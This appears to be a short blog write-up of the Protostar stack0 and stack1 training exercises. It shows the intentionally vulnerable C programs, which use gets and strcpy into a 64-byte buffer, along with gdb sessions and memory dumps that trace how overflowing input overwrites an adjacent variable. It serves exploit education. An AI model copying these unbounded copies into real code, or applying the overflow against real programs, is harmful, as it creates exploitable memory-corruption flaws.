Protostar

Stack buffer Overflows — Protostar | stack0 and stack1

What is a Stack Buffer Overflows? How to perfrom a stack overflow?

What is Protostar?

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];

modified = 0;
gets(buffer);

if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
gdb stack0
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
break *0x08048411
break *0x08048415
define hook-stop
i registers
x/24wx $esp
x/2i $eip
end
0xbffff740:  0xbffff75c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffff750: 0xb7fd7ff4 0xb7ec6165 0xbffff768 0x61616161
0xbffff760: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff770: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff780: 0x61616161 0x61616161 0x08006161 0xbffff7a8
0xbffff790: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
esp = bffff740
0x5c = 92 (in decimal)
$esp       + 92   = our value now
0xbffff740 + 0x5c = 0xbffff79c
0xbffff790: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff740: 0xbffff75c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff750: 0xb7fd7ff4 0xb7ec6165 0xbffff768 0x61616161
0xbffff760: 0x61616161 0x62626262 0x62626262 0x63636363
0xbffff770: 0x63636363 0x64646464 0x64646464 0x65656565
0xbffff780: 0x65656565 0x66666666 0x66666666 0x67676767
0xbffff790: 0x67676767 0x68686868 0x68686868 0x00000000
0xbffff740: 0xbffff75c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff750: 0xb7fd7ff4 0xb7ec6165 0xbffff768 0x61616161
0xbffff760: 0x61616161 0x62626262 0x62626262 0x63636363
0xbffff770: 0x63636363 0x64646464 0x64646464 0x65656565
0xbffff780: 0x65656565 0x66666666 0x66666666 0x67676767
0xbffff790: 0x67676767 0x68686868 0x68686868 0x00004141
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];

if(argc == 1) {
errx(1, "please specify an argument\n");
}

modified = 0;
strcpy(buffer, argv[1]);

if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
break *0x080484a7
b *0x080484ab
eip says in am on <main+67>
I can se the ‘a’ (61) pattern again
0xbffff720: 0xbffff73c 0xbffff972 0xb7fff8f8 0xb7f0186e
0xbffff730: 0xb7fd7ff4 0xb7ec6165 0xbffff748 0x61616161
0xbffff740: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff750: 0xb7ff0061 0x080496fc 0xbffff788 0x08048509
0xbffff760: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffff788
0xbffff770: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
}

Connecting the dots and rest is magic. https://ayedaemon.github.io/